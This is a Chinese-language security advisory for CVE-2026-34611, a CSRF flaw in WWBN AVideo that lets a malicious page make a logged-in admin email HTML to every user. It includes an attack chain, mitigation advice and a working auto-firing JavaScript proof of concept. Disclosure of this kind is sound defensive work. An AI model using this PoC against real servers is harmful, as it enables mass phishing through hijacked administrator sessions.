CVE-2026-34611 CVSS 6.5 中危

CVE-2026-34611: AVideo CSRF漏洞致任意邮件发送

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34611

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及之前版本在 `objects/emailAllUsers.json.php` 接口存在CSRF漏洞。该接口允许管理员发送HTML邮件，但未验证CSRF令牌。由于会话Cookie设置为 `SameSite=None`，攻击者可诱导管理员访问恶意页面，跨站发送请求，从而利用管理员身份向所有用户发送伪造的HTML邮件。

技术细节

该漏洞的根源在于服务器端对敏感操作的请求来源验证缺失。具体而言，`objects/emailAllUsers.json.php` 仅依赖Session Cookie来确认管理员身份，而未检查请求是否为用户主动发起（即缺少CSRF Token验证）。由于AVideo将Session Cookie的 `SameSite` 属性设置为 `None`，浏览器在发起跨站POST请求时会自动携带该Cookie。攻击者利用这一点，构造一个包含隐藏表单或AJAX请求的恶意网页，诱导管理员访问。一旦管理员加载该页面，浏览器即向目标服务器发送包含有效Session的邮件发送请求。服务器误认为是管理员本人的操作，从而执行了向全体用户发送HTML邮件的逻辑，导致严重的信息安全风险。

攻击链分析

STEP 1

诱骗访问

攻击者构造包含恶意CSRF脚本的HTML页面，并通过社工手段诱导已登录的管理员访问该页面。

STEP 2

跨站请求

管理员浏览器解析恶意页面，自动向AVideo服务器的 `objects/emailAllUsers.json.php` 接口发起跨域POST请求。由于 `SameSite=None`，请求携带了管理员的Session Cookie。

STEP 3

执行操作

AVideo服务器接收请求，验证Session有效，误认为是管理员操作，执行发送邮件的逻辑。

STEP 4

达成效果

平台所有注册用户收到攻击者伪造的HTML邮件，可能导致钓鱼攻击或恶意代码传播。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-34611: CSRF to Send Email -->
<!-- Host this on an attacker-controlled server and send the link to an admin -->
<html>
  <body>
    <script>
      function exploit() {
        var target = "https://<TARGET_AVIDEO_DOMAIN>/objects/emailAllUsers.json.php";
        var params = "subject=Urgent%20Update&message=<h1>Phishing%3C/h1%3E%3Cp%3EClick%20here%3C/p%3E";
        
        var xhr = new XMLHttpRequest();
        xhr.open("POST", target, true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        xhr.send(params);
      }
      
      // Auto trigger on load
      window.onload = exploit;
    </script>
  </body>
</html>

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员在Web服务器层面（如Nginx/Apache）配置Referer白名单过滤，阻止来自外部域名的POST请求。同时，建议暂时限制管理员账户的访问权限，仅在可信网络环境中管理后台。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表